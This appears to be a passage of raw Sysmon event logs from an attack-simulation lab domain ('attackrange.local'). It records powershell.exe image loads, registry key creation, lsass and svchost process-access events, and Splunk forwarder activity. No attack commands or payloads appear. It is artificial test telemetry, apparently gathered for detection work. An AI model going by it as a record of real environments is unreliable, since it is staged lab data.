10341000x800000000000000057348086Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.122{8B6011A9-886E-6164-1600-00000000F101}13166900C:\Windows\System32\svchost.exe{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057348085Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.122{8B6011A9-886E-6164-1600-00000000F101}13161348C:\Windows\System32\svchost.exe{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057348084Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.122{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValid 734700x800000000000000057348083Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.091{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\21ae9089eba57af8d90c2696ddf8620c\Microsoft.CSharp.ni.dll4.8.3761.0Microsoft.CSharp.dllMicrosoft® .NET FrameworkMicrosoft CorporationMicrosoft.CSharp.dllMD5=964847567F390EECD11E2314B6FE3CB1,SHA256=3897257C98046CE789A0520914D7012ECA59924FD67245095D2DB1A08E3B4A0Efalse-Unavailable 10341000x800000000000000057348082Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.075{8B6011A9-886B-6164-0B00-00000000F101}648812C:\Windows\system32\lsass.exe{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057348081Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.075{8B6011A9-886B-6164-0B00-00000000F101}648812C:\Windows\system32\lsass.exe{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057348080Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.075{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x800000000000000057348079Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.075{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x800000000000000057348078Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.075{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\5b778442ed2d60a5de14f752a124bf1a\System.Configuration.ni.dll4.8.4190.0 built by: NET48REL1LAST_BSystem.Configuration.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.dllMD5=9EAA59368783AFE4107F28B6ED8AB1E6,SHA256=BBAC50983BA9B2EDA9CBA8FD0F1DCABF71D24D736A973BA164AF6917A3FC2E7Ffalse-Unavailable 734700x800000000000000057348077Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.075{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft Corporationsystem.transactions.dllMD5=D17E11DDF716089AF736DBA7C4F24C75,SHA256=DF301F2F2A735A1A75EAE79E64CCFDAD335E319B98316E9E875F726FA2CB51D5trueMicrosoft CorporationValid 734700x800000000000000057348076Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.075{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Transactions\c4a9ae053d0ac0645c08ae81f083121d\System.Transactions.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft Corporationsystem.transactions.dllMD5=992BDD0BA5CA1305C35337080E779862,SHA256=37D038879A46694553D2D62090B2C34B5C4A6310B753DBE8E5AC80AE90700D21false-Unavailable 734700x800000000000000057348075Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.075{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\44471e4b0e7b143ba574354f8937ee2c\Microsoft.PowerShell.Security.ni.dll10.0.14393.2848Microsoft Windows PowerShell Management CommandsMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.PowerShell.Security.dllMD5=EC09E92E968F15B182014DFF6452C459,SHA256=7A6F5511CA622E29367F6ED25A0E924C4BD1DD8D8CAC594119F1555B208C43DDfalse-Unavailable 734700x800000000000000057348074Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:45.060{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Just-In-Time CompilerMicrosoft® .NET FrameworkMicrosoft Corporationclrjit.dllMD5=0745D9F1BAC58E47CC87656768304313,SHA256=BBA1936354A9EF269B283FE706A74B73BE39CAF4DD57AB0D1CD06A1C75E260A2trueMicrosoft CorporationValid 17141700x800000000000000057348073Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:18:45.044{8B6011A9-5BA4-618E-53F3-04000000F101}4192\PSHost.132811931248975312.4192.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000057348072Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.991{8B6011A9-5BA4-618E-53F3-04000000F101}4192ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_3z2vt43w.nqk.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7falsetrue 23542300x800000000000000057348071Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.991{8B6011A9-5BA4-618E-53F3-04000000F101}4192ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_jvrhhdcp.454.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7falsetrue 12241200x800000000000000057348070Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.991{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057348069Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.991{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057348068Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.991{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057348067Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.991{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348066Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.991{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348065Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.991{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348064Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.991{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348063Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.991{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348062Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.991{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348061Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.991{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348060Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.991{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348059Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.991{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348058Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.991{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348057Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.991{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348056Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.991{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348055Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.991{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 354300x800000000000000021219859Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:32.627{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64341-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219858Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:45.298{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B077F0D710754C2CA77B644DCE06DBD,SHA256=8661F19020D231E0C8FFE0E65B2510E9F65D080290BEFC10A5C5877B4862C406,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 12241200x800000000000000057348054Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.991{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348053Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.991{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348052Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.991{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348051Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.991{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348050Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.991{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348049Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.991{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348048Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.991{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057348047Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.991{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll10.0.14393.0 (rs1_release.160715-1616)Crypto SIP provider for signing and verifying PowerShell script files (.ps1/.ps1xml)Microsoft® Windows® Operating SystemMicrosoft Corporationpwrshsip.dllMD5=5366DEE11C59571EC48B56020E8949DE,SHA256=EE5CDBEDA2067413ACB7B5E7B4AF53B40336148CA104D1671212B43737EB348CtrueMicrosoft WindowsValid 12241200x800000000000000057348046Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.991{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057348045Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.991{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 734700x800000000000000057348044Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.991{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057348043Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.991{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\iertutil.dll11.00.14393.4467 (rs1_release.210604-1844)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=1D608361848C3A3AC56488995E8D0BB1,SHA256=D95DE5DBAD08E22CB0CFB9322220E752F16124C15867F7748E4D64795E400EBFtrueMicrosoft WindowsValid 23542300x800000000000000021219857Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:45.220{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=01B23BCE60EAF73C3BD1B3E1E64EF879,SHA256=5F172D559034B22C25F78EE26C77125F064ACFC98487E48953A4A751B54B52E4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219856Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:45.220{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=18437A320CFC143C3E57B996A8D1A821,SHA256=37B2204BEDD26F216ACFADDAF9C71B211A93D00A17AF80B2EC355CE17E66EB56,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057348133Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:17.613{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54567-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057348132Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:46.605{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057348131Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:46.605{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E606064E45D4FD20114EA37EAEA3A0A7,SHA256=77D485792D8B6F1773030C2E1B2154FE05BEA8DB09AF1D20F5932068F6E08832falsetrue 23542300x800000000000000021219860Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:46.329{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBFEC2A148D3FD51E93D6A17BFE2E010,SHA256=C6AEE048DBDF81B91F30F7155747A52693B6DFA3EE04ED0D42184536A27E5D97,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057348157Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:47.619{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057348156Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:47.619{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB2ECB6B2BD2F6BE6579B7F6FC7FD695,SHA256=6675DAA5942822AAF0C68F40676E108BC04E36DF8648527B2D351A6A8299A0A9falsetrue 23542300x800000000000000021219861Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:47.329{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AD1EA0F34C95844C0AB1979FF6C30F1,SHA256=264739083AA34350ABCB78175C94FB8D9BB6907514290D419EE5AA3F71AE7907,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057348155Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:47.057{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.bin2021-09-22 02:41:24.950 23542300x800000000000000057348154Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:47.057{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.binMD5=C11E59DD48344597E7153D43ABD6C8E4,SHA256=F1C80674415B5784FC1678D839E23551A46BA799B911E5C0FD5F04B85B2CC803falsetrue 11241100x800000000000000057348153Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:47.057{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.bin2021-09-22 02:41:24.950 23542300x800000000000000057348152Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:47.057{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.binMD5=358788E7402139639675425E20A95947,SHA256=0504E8CE34468A1BE167583EC3B442CFCBC69B646E4C50B4C6BBDA0FF2745255falsetrue 11241100x800000000000000057348151Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 